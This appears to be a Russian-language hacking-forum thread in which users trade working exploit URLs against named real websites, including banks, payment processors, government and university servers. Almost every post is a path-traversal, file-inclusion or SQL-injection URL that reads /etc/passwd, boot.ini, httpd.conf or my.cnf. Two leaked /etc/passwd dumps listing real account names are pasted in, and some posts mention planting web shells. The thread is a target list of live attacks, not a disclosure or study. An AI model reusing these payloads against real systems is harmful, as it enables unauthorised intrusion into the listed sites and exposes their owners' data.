http://www.nedvigimost.com.ua/news.php?num=../../../../../../etc/passwd%00&cat=odnews

Решил сюда запостить

http://www.cosmotech.info/index.php?page=-5+union+select+1,'/etc/passwd',3,4,version()

http://www.drg.irp.com/cgi-bin/webplus.exe?Script=../../../etc/passwd

http://www.irpsys.com/cgi-bin/webplus.exe?script=/../../../../etc/passwd

http://www.oksybox.de/cgi-bin/auktion.pl?t=../../../../../../../../../../../../../etc/passwd%00
http://www.a-f-a24.de/cgi-bin/auktion.pl?t=../../../../../../../../../../../../../etc/passwd%00

http://www.dbzhevan.net/main.php?id=../../../etc/passwd
в исходнике
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:12:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ident:x:98:98::/home/ident:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
rob:x:501:501::/home/rob:/bin/bash
matt:x:502:502::/home/matt:/bin/bash
cody:x:503:503::/home/cody:/bin/bash
dan:x:505:505::/home/dan:/bin/bash
ben:x:506:506::/home/ben:/bin/bash
rick:x:508:508::/home/rick:/bin/bash
shawn:x:510:510::/home/shawn:/bin/bash
alligosh:x:498:498::/home/alligosh:/bin/bash
dhandy:x:497:497::/home/dhandy:/bin/bash
spencer:x:496:496::/home/spencer:/bin/bash
mike:x:489:489::/home/mike:/bin/bash
sean:x:488:488::/home/sean:/bin/bash
paul:x:485:499::/home/paul:/bin/bash
robert:x:471:471::/home/robert:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:15:11:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:507:507::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:509:509::/usr/local/cpanel:/bin/bash
americb0:x:513:514::/home/americb0:/bin/noshell
laptopen:x:514:515::/home/laptopen:/bin/noshell
jarosikc:x:517:518::/home/jarosikc:/bin/noshell
shoppin1:x:518:519::/home/shoppin1:/bin/noshell
teammohc:x:519:520::/home/teammohc:/bin/noshell
specialt:x:520:521::/home/specialt:/bin/noshell
jamessha:x:522:523::/home/jamessha:/bin/noshell
infoisus:x:525:526::/home/infoisus:/bin/noshell
highbarc:x:527:528::/home/highbarc:/bin/noshell
solmannc:x:529:530::/home/solmannc:/bin/noshell
baytechw:x:530:531::/home/baytechw:/bin/noshell
sukawati:x:533:534::/home/sukawati:/bin/noshell
securebu:x:534:535::/home/securebu:/bin/noshell
lyonsfal:x:535:536::/home/lyonsfal:/bin/noshell
postjobs:x:537:538::/home/postjobs:/bin/bash
stspporg:x:538:539::/home/stspporg:/bin/noshell
apicalsc:x:539:540::/home/apicalsc:/bin/noshell
hydaddsc:x:540:541::/home/hydaddsc:/bin/noshell
trustyne:x:541:542::/home/trustyne:/bin/noshell
akindwor:x:542:543::/home/akindwor:/bin/noshell
fairelea:x:543:544::/home/fairelea:/bin/noshell
deafspar:x:544:545::/home/deafspar:/bin/noshell
epgroupf:x:545:546::/home/epgroupf:/bin/noshell
и так далее

Итак, Вот что я сегодня накопал
http://www.cyprus-directory.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://duitsland-vakantieland.nl/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://www.earrs.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/

http://gallery.mastervcd.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://www.goqueer.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://incrediblebears.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd

http://www.louisvillenews.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://macondo.virtualave.net/cgi-bin/general/tseekdir.cgi?location=/etc/passwd%00

http://www.markenshop-portal.de/cgi-bin/tseekdir.cgi?location=/etc/passwd%00


в гугле проверял, вроде таких же язв нету
Античату респект

http://www.officesystems.ru/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.exyucaffe.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.liceoleonardogiarre.it/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.zavisni.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd

Linuxcrow.unixbsd.info2.6.9-55.0.12.ELsmp#1 SMP Fri Nov 2 11:19:08 EDT 2007i686

http://istjuanpabloii.org/portal/iframe.php?file=[remote вжепь ебрило] =)

http://vnkatonak.com/autohtml.php?filename=../../../../../../etc/passwd

http://www.ke-f.org/autohtml.php?filename=../../../../../../etc/passwd


Порносайтец
http://gallery.mastervcd.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

http://www.fund-africa.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.wesways.net/index.php?read=../../../../../../../../../../../../../etc/passwd

http://cybertaka.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.createbusiness.biz/paypal/index.php?read=../../../../../../../../../../../../../etc/passwd

http://iprobill.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://pagoquick.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://worldpayme.com/index.php?read=../../../../../../../../../../../../../etc/passwd

Банк какойто
http://globalbizbank.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.bitzone.co.uk/index.php?read=../../../../../../../../../../../../../etc/passwd

http://scenepay.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.payrupees.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.extreme-pay.com/index.php?read=../../../../../../../../../../../../../etc/passwd

we.mtu.edu
__http://www.we.mtu.edu/faq.php?which=../../../../../../etc/passwd%00


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin

Можно и без самих логов ИМХО
если каждый лог вылаживать то в топике такой бардак будет

тем более он не несет кокой то интересной инфы
ну это только мое мнение

//******************************************

Всем привет
ище одна бессонная ночь закончилать вроде бы хорошим результатом

http://www.pyrexglasstoys.com/cgi-bin/store/index.cgi?page=../../../../../../etc/passwd
http://www.fabulousfoods.com/cgi-bin/store/index.cgi?page=../../../../../../../../../../../etc/passwd
http://www.cravingcandie.com/cgi-bin/store/index.cgi?page=../../../../../../../../../../../etc/passwd
http://www.cidneydiamond.com/cgi-bin/store/index.cgi?page=../../../../../../../../../../../etc/passwd
http://www.giftarmenia.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.bikinideals.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.barnfabriccenter.com/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.nicedaymusic.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.allstargiftbaskets.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.heavens-stone.com/cgi-bin/jewelry/store/index.cgi?page=../../../../../../../../etc/passwd
http://www.jewelry90210.com/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd

Ну по крайней мере баян не наблюдается
И деньги на инет заканчиваются :-)))
Античат респект

ааааа
и еще одно :
http://www.cncnews.org/index.php?files=../../../boot.ini

PR-4
для любителей нетрадиционного метода набора текста =))

http://blackheartmagazine.com/index2.php?p=[remote]

insfocus.com
http://www.insfocus.com/site.php?page=[inc]

http://lwdb.ru/index.php?part=[x3]
не пинайте раскрыть не смогла

Lamersha там нет инклуда

http://lwdb.ru/index.php?part=123%00

gibson там нет инклуда (с) blackybr

http://shems.h1.ru/?../../../../../../../etc/passwd

Да. товарищи, читайте внимательно маны и правила. тема называется php иньекция.

file_get_content, рид функции, и неполные инклуды аля https://forum.antichat.ru/showpost.php?p=613811&postcount=635 не являются таковыми. впредь буду удалять и минусовать.

http://www.shu.ru/index.php?link2=../../../../../../etc/passwd


У меня попутно вопрос. Ну и нашел я эти пароли а что дальше то? куда их пихать? что делать?

http://www.shu.ru/index.php?link2=../../../../../../etc/passwd


У меня попутно вопрос. Ну и нашел я эти пароли а что дальше то? куда их пихать? что делать?

это не пароли паролей там вообще нет .
Почитай вот для начала

https://forum.antichat.ru/threadnav12123-1-10-php+Injection.html
http://forum.web-hack.ru/index.php?showtopic=33063&go=1
http://www.inattack.ru/article/478.html (Zadoxlik ;) )

Вот нашел такую штуку

http://forum.wileyeurope.com/cgi-bin/dcforum/install_help.cgi
http://www.livingdonorsonline.org/cgi-bin/dcforum/install_help.cgi
http://www.sciential.net/cgi-bin/dcforum/install_help.cgi
http://www.variety.ru/cgi-bin/dcforum/install_help.cgi
http://www.dla.org/cgi-bin/dcforum/install_help.cgi
http://www.atlantadna.org/cgi-bin/dcforum/install_help.cgi
http://www.flightadventures.com/cgi-bin/dcforum/install_help.cgi
http://www.telephonyworld.com/cgi-bin/dcforum/install_help.cgi
http://bricoespacio.estilisimo.com/cgi-bin/dcforum/install_help.cgi
http://www.pursuit-performance.com.au/cgi-bin/dcforum/install_help.cgi
http://www.homeandgardensite.com/cgi-bin/dcforum/install_help.cgi
http://www.immnet.com/cgi-bin/dcforum/install_help.cgi
http://www.sciential.net/cgi-bin/dcforum/install_help.cgi
http://world-templates.com/cgi-bin/dcforum/install_help.cgi



install_help.cgi - Этот сценарий составит список содержимого директорий
в поле ввода пишите
../../../../../../../etc и получаете то что хотели
Вот еще бы файлы бы открывал цены бы ему небыло
Не ругайтесь если не туда выложил

http://www.script.com.ua/dev/materials.php?id=../../../../../../../../../../../../etc/passwd

http://www.nxne.com/page.php?page=../../../../../../../etc/passwd
http://www.nxne.com/page.php?page=../../../../../../../etc/passwd
http://www.crashrecords.co.uk/online/page.php?xPage=../../../../../../../etc/passwd
http://www.bristolferry.com/page.php?xPage=../../../../../../../etc/passwd
http://www.famousquotes.com/page.php?page=../../../../../../../etc/passwd
http://www.ceenorm.co.uk/page.php?xPage=../../../../../../../etc/passwd

для любителей нетрадиционного метода набора текста
microsoft.com зареган на tucows)

tucows.com
http://tucows.com/software.html?t2=[FFF]

http://www.novistil.ru/index.php?option=com_zilchcatalog&task=view&id=EBLO

http://www.coolermaster.ru/index.php?LT=english&Language_s=2&url_place=product_class_include&files=../../../../../../../../etc/passwd

после просмотра фильма ал пачино пошел на сайт его смотреть нашел шотбокс. но у шотбокс аллергия на скобки пока только это смог кто дальше сможет :)
http://www.alpacino.in/shoutie/shouts.php?include=../../../../../etc/passwd

http://upload.nostra.by/search.php?action=zalupa

Muhacir, может это тебе согреет душу)
bobob, сорри, если ты про эту скуль;)
http://www.alpacino.in/index.php?mact=Album,cntnt01,default,0&cntnt01albumid=4&cntnt01pictureid=52&cntnt01returnid=9999999999'+UNION+SELECT+1,2,3,4,5 ,6,7,8,9/*

http://rusxmms.sourceforge.net/index.php?page=tis

http://www.clinlab-kafedra.ru/main.php?file=../../../../../../../../../../../etc/passwd
http://www.globalloan.co.kr/company/main.php?file=../../../../../../../../../../../etc/passwd
http://www.globalloan.co.kr/customer/main.php?file=../../../../../../../../../../../etc/passwd
http://chess.clustertech.com/cn/main.php?file=../../../../../../../../../../../etc/passwd
http://www.gooodworld.co.kr/main.php?file=../../../../../../../../../../../etc/passwd
http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../etc/passwd
http://www.pjha.org/index.php?file=../../../../../../../../../../../etc/passwd
http://www.penguinadventure.com/index.php?file=../../../../../../../../../../../etc/passwd
http://www.ash.coop/downloadfile.php?file=../../../../../../../../../../../etc/passwd
http://www.tigr.org/tdb/e2k1/ath1/qpcr/downloadfile.php?file=../../../../../../../../../../../etc/passwd
http://www.bier-degustationen.ch/downloadFile.php?file=../../../../../../../../../../../etc/passwd
http://voaklabs.com/downloadFile.php?file=../../../../../../../../../../../etc/passwd
http://www.ms-ins.co.th/claim_service/downloadFile.php?file=../../../../../../../../../../../etc/passwd
http://www.bierverkostung.ch/downloadFile.php?file=../../../../../../../../../../../etc/passwd

http://www.russian-inok.org/books/nachalnik/page.php?page=../../../../../../../../etc/passwd
:)

http://www.hd.kiev.ua/admin/download.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.crcn.kiev.ua/admin/download.php?filename=../../../../../../../../../../../../../../../../../etc/passwd

http://www.lucani.org/cirigliano/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://enricofontana.it/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd

Вот нашел пару php. Я новичок и хотел бы узнать что дают те логи которые там лежат? Спасибо!

http://carpeople.biz/admin/download.php?gubun=01&filename=../../../../../../../../../../../../../../../../../etc/passwd
http://www.onlinedog.co.kr/admin/download.php?gubun=01&filename=../../../../../../../../../../../../../../../../../etc/passwd
http://edufinder4u.com/admin/download.php?gubun=study&%20filename=../../../../../../../../../../../../../../../../../etc/passwd

Эти все на одном айпи
http://www.jasmine.in.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.albertas.kiev.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.svarka2000.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.tir11.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.vashcomfort.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.modul-fasad.kiev.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.autofavourite.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.a-budservis.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.viza-vi.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.kamat.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.kips.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.easy-coffee.com/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.omb.in.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.alprof.com.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd
http://www.autoforum.net.ua/admin/download.php?filename=../../../../../../../../../../../../../../../etc/passwd

Вот вам gov-на
http://www.nenc.gov.ua/isef/view/index.php?adress=../../../../../../../../../../etc/passw

http://sodex.kiev.ua/eng/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd
http://www.airfiltersupply.com/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd
http://vethelp.ur.ru/index.php?../../../../../../../../../../../../../../../../../etc/passwd
http://www.jarrossay.net/contact.php?adress=[url]
ЗЫ через шел посмотрел, там еще куча разных сайтов на сервере

http://asiane.byu.edu/arabic/index.php?content=../../../../../../../../../../etc/passwd%00

http://www.balkanpeace.org/index.php?index=../../../../../../../../../../../../etc/passwd%00

http://www.parcoleonardo.it/php/file.php?file=../../../../../../../../../../../etc/passwd
http://slanyfree.net/howto.php?file=../../../../../../../../../../../etc/passwd

http://www.holsteinworld.com/ontheroad/index.php?file=/../../../../../../../../../../../../../../../etc/passwd

http://bioweb.franko.lviv.ua/biophys/index.php?file=../../../../../../../../../../../etc/passwd
http://www.icc-media.org/telecharger1.php?file=../../../../../../../../../../../etc/passwd

СТОМАТОЛОГИЯ:
http://www.de-line.ru/?module=[shellllll] =>blacktooth ;)

Міністерство освіти і науки України
http://www.mon.gov.ua/main.php?query=../../../../../../../../../../../etc/passwd
omg

Антибояна не нашёл, поэтому простите, если повторяюсь
http://www.steelcentral.net/index.php?page=../../../../../../../../../../etc/hosts
http://www.steelcentral.net/index.php?page=../../../../../../../../../../etc/syslog.conf
http://www.steelcentral.net/index.php?page=../../../../../../../../../../etc/services
http://www.steelcentral.net/index.php?page=../../../../../../../../../../etc/group
http://www.steelcentral.net/index.php?page=../../../../../../../../../../etc/profile
http://www.steelcentral.net/index.php?page=../../../../../../../../../../etc/bashrc
http://www.steelcentral.net/index.php?page=../../../../../../../../../../etc/skel/.bashrc
http://www.steelcentral.net/index.php?page=../../../../../../../../../../etc/httpd/logs/error_log
http://www.steelcentral.net/index.php?page=../../../../../../../../../../usr/local/apache/logs/error_log
http://www.steelcentral.net/index.php?page=../../../../../../../../../../usr/local/apache/logs/access_log

http://www.automuna.com.ua/html/static.php?file=../../../../../../../../../../../etc/passwd

http://www.txregionalcouncil.org/display.php?page=../../../../../../../etc/passwd
http://www.hamantfoundation.org/centromedico/index.php?page=../../../../../etc/passwd
http://snsbizdev.com/index.php?page=../../../../../../../../../etc/passwd

http://newgeneration.lv/rus/dla_pressi/interv_u_pastora/in_site/in_site/tools/transfer.php?file=../../../../../../../../../../../etc/passwd

http://download.unionsbraeu.de/transfer.php?file=../../../../../../../../../../../etc/passwd

http://www.xtreemmusic.com/contact/public/static.php?file=../../../../../../../../../../../etc/passwd

http://minipc.org/safepup/index.php?file=../../../../.././../../../../../../../.././../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.excellentliving.org/index.php?file=../../../../.././../../../../../../../.././../../../../../../../../../../../../../../../../../../../../../etc/passwd

http://www.terrano.or.id/static.php?file=../../../../../../../../../../../etc/passwd
http://storybush.net/static.php?file=../../../../../../../../../../../etc/passwd

http://download2.hobbyarea.ru/index.php?file=/../../../../../../../../../../../../../../../../../../etc/passwd
http://www.haus24.biz/index.php?file=/../../../../../../../../../../../../../../../../../../etc/passwd
www.new-techno.ru/index.php?file=/../../../../../../../../../../../../../../../../../../etc/passwd
http://milfordnh.info/town_general/report2007/index.php?file=/../../../../../../../../../../../../../etc/passwd
http://www.designetch.com.au/publications/club-link/index.php?file=/../../../../../../../../../../etc/passwd

http://www.donorsforum.org.ua/media/files/get.php?file=../../../../../../../../../../../etc/passwd
http://www.ng.lv/rus/propovedi/propovedi_m/pastorskie_vstreci___2007/in_site/in_site/tools/transfer.php?file=../../../../../../../../../../../etc/passwd

http://www.alteclansing.com/index.php?file=../../../../../../../../../../../etc/passwd%00&iproduct_id=64

http://www.mercierauto.com/static.php?file=../../../../../../../../../../../etc/passwd
http://www.metecol.com.ua/EN/static.php?file=/../../../../../../../../../../../etc/passwd

от поста nikoTM
http://forum.antichat.ru/showpost.php?p=670223&postcount=429

http://www.solanohelpwanted.com/index.php?page=../../../../../../../etc/passwd

http://kdm.dgu.ru/static.php?file=../../../../../../../../../../../etc/passwd
http://www.jobtour.ru/PHP-Nuke/static.php?file=../../../../../../../../../../../etc/passwd

Локальный: http://www.reichenthal.at/pages/service-include.php?incl=../../../../../../../etc/passwd


Удаленныйhttp://schwein.ru/news/index.php?page=(адрес шелла)

Удаленныйhttp://schwein.ru/news/index.php?page=(адрес шелла)

идет фильтрация на точку

http://scenepay.com/index.php?read=../../../../../../../../../../../../../etc/passwd

http://www.cs.uofs.edu/~tjm2f/index.cgi?incl=/etc/passwd
http://www.aeroteam.ee/indexr.php?show=/etc/passwd

edu - PR7
http://pratt.edu/~cg525/index.php?file=../../../../etc/passwd&beensubmitted=true

http://site.ksu.edu.ua/format.php?file=../../../../../../../../../../../etc/passwd

EDU PR5
читалка файлов...вообще крутая вещь))
http://academic.marist.edu/skiteam/index.php?page=/usr/local/apache/conf/httpd.conf

gov PR5
http://www.bpr.gov.my/cda/m_perundangan/akta_download.php?file=../../../../../../../../../../../etc/passwd

http://barnstormers.acm.jhu.edu/tickets.php?show=..%2F..%2F..%2F..%2F..%2F..%2F..% 2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..% 2Fetc%2Fpasswd
http://darwin.eckerd.edu/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F etc%2Fpasswd
http://www-cogsci.ucsd.edu/display_simple.php?cat=simple-page&page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpass wd&title=The%20Glushko%20Challenge
http://www.cis.ufl.edu/research/cvgmi/Projects.php?view=..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.. %2Fetc%2Fpasswd
http://people.msoe.edu/~capriotj/tools/filetotext.php?file=..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2Fetc%2Fpasswd

http://www.feckdeamon.co.uk/zomplog/.../../etc/passwd

http://www.feckdeamon.co.uk/zomplog/install/

http://www.fmij.com/blog/upload/forc...load.php?file=[local download]

EDU - PR5
http://www.tceb.edu.tw/board/data/upload/download.php?file=../../../../../../../../../../../etc/passwd

http://sophie.byu.edu/literature/index.php?p=../../../../../../.../../../etc/passwd&textid=2079

PR5
http://www.tcsac.gov.tw/file.php?file=../../../../../../../../../../../etc/passwd

http://www.w-mueller.com/adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd

http://www.czerniejewo.pl/index.php?page=../../../../../../../../../../../etc/passwd

http://www.provincia.chieti.it/iframe.php?file=/etc/passwd
http://www.fas-line.net/html/iframe.php?file=/etc/passwd
http://www.fuomcokozel.com/iframe.php?file=/etc/passwd
http://www.oldcatholicorthodoxchurch.net/iframe.php?file=/etc/passwd

http://www.ipunkt.biz/service/php-downloader/download.php?file=../../../../../../../../../../../etc/passwd

http://www.guameis.com/home.php?content=../../../../../../../../../../../../../../etc/passwd
http://www.nedvigimost.com.ua/news.php?num=../../../../../../etc/passwd%00&cat=odnews
http://www.piling.ru/site/page.php?num=../../../../../../../../../../../../../../../etc/passwd%00

Sharjah Awqaf General Trust (SAGS)
http://www.awqafshj.com/php/arabic/downloadNewsletter.php?file=../../../../../../../../../../../etc/passwd

http://russian-cash.info/online/logo.jpg

PHP антибоян, собранная вся база с 1 по 70 страницы. Огромное спасибо за помощь Zircool (http://forum.antichat.ru/member.php?u=22600) . Работаем теперь по антибояну, за нарушение правил пользователь будет наказан (-) минусом.

PHP антибоян (http://russian-cash.info/online/php-include.php)

http://www.mg-protect.ru/index.php?lng=ua&page=../../../../../../../../../../../../../../etc/passwd

http://station2norfolk.com/home.php?page=../../../../../../../../../../../../../../etc/passwd%00

http://www.paulevans.name/page.php?page=../../../../../../../../../../../../../etc/passwd%00

http://www.24steps.com/quellcode.php?file=../../../../../../../../../../../etc/passwd
http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/passwd

http://www.competeprosper.ca/download.php?file=../../../../../../../etc/httpd/conf/httpd.conf
http://www.competeprosper.ca/download.php?file=../../../../../../../etc/passwd
=
http://www.orlandoedc.com/core/file.php?loc=../../../etc/passwd
http://www.orlandoedc.com/core/file.php?loc=../../../etc/rc.d/init.d/httpd
http://www.orlandoedc.com/core/file.php?loc=../../../etc/httpd/conf/httpd.conf
http://www.orlandoedc.com/core/file.php?loc=../../../proc/version

http://www.mvastro.org/members/newsletter.php?file=../../../../../../../../../../../etc/passwd

http://www.potpourri-sarl.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
http://www.vastkust-dental.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

http://pes.inf.puc-rio.br/pes06_1_1/cel/aplicacao/showSource.php?file=/etc/my.cnf
http://pes.inf.puc-rio.br/pes06_1_1/cel/aplicacao/showSource.php?file=/etc/passwd

http://www.mcmrdd.org/site//modules/FileManager/postlet/uploader.php?inc=../../../../../../../etc/passwd

http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/passwd
http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/my.cnf

хз возможно боян PHP антибоян не работает (


http://asiane.byu.edu/arabic/index.php?content=/etc/passwd%00
http://sophie.byu.edu/resources/index.php?p=../../../../../../../etc/passwd

http://zerowebsites.com/index.php?page=../../../../../../../../../../../etc/passwd
http://www.precisionelectricllc.com/index.php?page=../../../../../../../../../../../etc/passwd

http://www.wiscnews.com/archives/read.php?info=../../etc/passwd
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://forum.anime-club.ro/main.php?m=../../../../../etc/passwd%00
http://www.sasha.by/doc2.php?page=../../../../../etc/passwd
http://abw.by/?act=/etc/passwd%00

http://www.just-tea.com.tw/teashop/justtea_wish.php?file=../../../../../../../boot.ini

Microsoft Windows 2000 Professional ))))

Вообщем решил закладки в опере разобрать, бо столько барахла накопилось...

http://www.3utelecom.com/index.php?include=/etc/passwd
инклуд, не поддаецо раскручиванию

http://www.anc.org.za/caucus/index.php?include=index.php
какаято кривая читалка файлов

http://sbe.comu.edu.tr/index.php?sosbil=index.php
локальный инклуд + на сервере сейф мод

http://ax2.old-cans.com/index.php?include=robots.txt
локальный инклуд. рядом лежит файл info.php, и вроде как allow_url_fopen=On, но удаленные файлы инклудить отказываецо =\

http://www.elementalafrica.org.za/index.php?include=index.php
читалка файлов

http://www.clan-dl.sk/index.php?include=index.php
локальный инклуд

http://www.highqsoft.com/index.php?include=../index.php
читалго файлов 0_o

http://www.pnosker.com/index.php?include=.htaccess
толи читалго, толи инклуд, в подробносте не вдавалсо

http://kompaktservice.com/index.php?include=index.php
локальный инклуд

http://www.flexsys-group.co.uk/index.php?include=.htaccess
и опять же локальный инклуд

http://klassenmanagement.com/index.php?include=../../../../../../../../etc/passwd%00
читалго или инклуд, непомню

http://www.spa-nyc.com/custompage.php?include=/etc/passwd
инклудец локальный

http://www.overseaspropertybroker.com/index.php?include=index
также локальный инклуд

http://www.machinery-food.com/index.php?include=/etc/passwd%00
локальный инклуд

http://www.wittmann-weingut.de/kk_templates/index.php?INCLUDE=../
локальный инклуд

http://www.worldaccessnet.com/index.php?include=../../../../../../../../../../etc/passwd/%00
локальный инклуд

http://www.kiva.org/ PR:7
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/passwd%00
